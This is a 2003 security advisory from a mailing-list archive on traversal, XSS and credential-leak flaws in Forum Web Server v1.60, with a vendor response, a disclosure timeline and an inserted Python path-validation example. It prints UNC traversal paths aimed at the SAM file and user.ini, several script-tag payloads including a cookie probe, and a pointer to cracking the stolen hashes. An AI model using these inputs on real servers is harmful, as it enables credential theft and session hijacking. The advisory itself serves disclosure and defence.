Vulnwatch mailing list archives

Multiple vulnerabilities found in Forum Web Server v1.60


From: matrix () infowarfare dk
Date: Thu, 6 Mar 2003 08:45:09 +0100

                           Multiple vulnerabilities
                        found in Forum Web Server v1.60
                         http://www.minihttpserver.net
                         
                          Discovered by Dennis Rand
                             www.Infowarfare.dk
------------------------------------------------------------------------


SUMMARY
WebForums Server allows you to set up a bulletin board and photo/file
exchange web service. It offers a built-in HTTP engine, internal database
engine, integrated HTML/Script pages, user management interface, message
board engine and a secure file Upload/Download option. It is without a doubt
the easiest and most complete all-in-one Forum Server software you have seen.

First, it is possible to get access to server files outside the restricted
area of the server and make sensitive files public.
Second, there is an XSS vulnerability in the Forum area.
Third, it is possible to steal usernames and passwords.

DETAILS

Vulnerable systems:
 * Forum Web Server v1.60 on Windows NT 4.0 and Windows 2000 Server, fully patched
 
Immune systems:
 * Forum Web Server v1.61

A crafted request allows remote users to break out of restricted
directories and gain read access to the system directory structure,
i.e. it is possible to retrieve files from outside the restricted areas.
The server is also vulnerable to XSS, and last but not least
I've discovered an information leak that exposes the user database
of the Forum Web Server.


The following transcript demonstrates a sample exploitation of the 
vulnerabilities:
-------------------------------------------------------------------
Traversal:
Within the FileSharing area, press the "Upload new file" button.
Now in the upload field just insert:

\\<vuln host>\c$\winnt\repair\sam._

This will now be uploaded to an area where you can retrieve the sam._
file and then use e.g. L0phtCrack to crack the passwords.

XSS:
When posting or replying to a message in the "Message Forum" it is
possible to exploit the XSS vulnerability in both the Subject and the Message.

e.g. insert any of these into either the Subject or the Message field:
<script>alert('I OwN You');</script>
<img%20src=javascript:alert(document.domain)>
<script>alert(document.cookie)</script>
<script>window.open('http://www.infowarfare.dk')</script>

Information leak:
Using the traversal flaw it is possible to get the usernames and
passwords from the Forum Web Server simply by "uploading"
\\<vuln-host>\c$\program Files\web froums server\user.ini
The usernames and passwords are stored in clear text, ready to use.
--------------------------------------------------------------------
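The traversal and information-leak cases above share one root cause: the upload field is taken as an arbitrary Windows path, so a UNC path to an administrative share is read as if it were a local file. The check below, added here as an illustration and not the vendor's fix (the share root C:\WebForums\shared, the host name "victim" and the function names are assumed), accepts only a relative name that resolves strictly inside the share directory and refuses UNC prefixes, drive letters, rooted paths and ".." segments before anything is read.

```python
import ntpath
import re

# Directory the file-sharing area may read from (assumed layout, not the
# product's real configuration).
SHARE_ROOT = r"C:\WebForums\shared"

# Characters Windows forbids in file names; ':' also opens an NTFS alternate
# data stream, so it is rejected anywhere inside a component.
_ILLEGAL = re.compile(r'[<>:"|?*\x00-\x1f]')


def is_safe_upload_path(supplied: str, root: str = SHARE_ROOT) -> bool:
    """True only if `supplied` names a file strictly below `root`.

    ntpath is used deliberately so Windows path rules (backslashes, UNC
    prefixes, drive letters) are applied even when this runs elsewhere.
    """
    if not supplied or supplied != supplied.strip():
        return False
    # A drive or UNC prefix (\\host\c$, C:) or a rooted path means the caller
    # chose the location, which is exactly the flaw in the advisory.
    drive, tail = ntpath.splitdrive(supplied)
    if drive or tail.startswith(("\\", "/")):
        return False
    parts = [p for p in re.split(r"[\\/]+", tail) if p]
    if not parts:
        return False
    for part in parts:
        if part in (".", "..") or _ILLEGAL.search(part):
            return False
        # Windows silently strips trailing dots/spaces, which aliases names.
        if part.endswith((".", " ")):
            return False
    # Belt and braces: the normalised result must still sit under the root.
    resolved = ntpath.normpath(ntpath.join(root, *parts)).lower()
    root_n = ntpath.normpath(root).lower()
    return resolved.startswith(root_n + "\\")


def safe_join(supplied: str, root: str = SHARE_ROOT) -> str:
    """Return the on-disk path for an accepted name, or raise ValueError."""
    if not is_safe_upload_path(supplied, root):
        raise ValueError(f"rejected upload path: {supplied!r}")
    return ntpath.normpath(ntpath.join(root, supplied))
```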

Detection:
Forum Web Server is vulnerable to the above-described attacks. 
Earlier versions may be susceptible as well. To determine if a specific 
implementation is vulnerable, experiment by following the above 
transcript. 

Vendor response:
Received first reply from David Yuan (Master@minihttpserver):
We thank you for the information and will fix this issue as soon as possible.



Disclosure timeline:
--------------------
21/02/2003 Found the vulnerabilities.
21/02/2003 Reported to vendor (support () minihttpserver net and
master () minihttpserver net).
21/02/2003 Vendor reply; they now know of the vulnerabilities.
04/03/2003 Fix made public.
06/03/2003 Public disclosure.


ADDITIONAL INFORMATION
The vulnerabilities were discovered by Dennis Rand <mailto:matrix () infowarfare dk>

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. In no event shall we be liable for any damages whatsoever including 
direct, indirect, incidental, consequential, loss of business profits or 
special damages. 
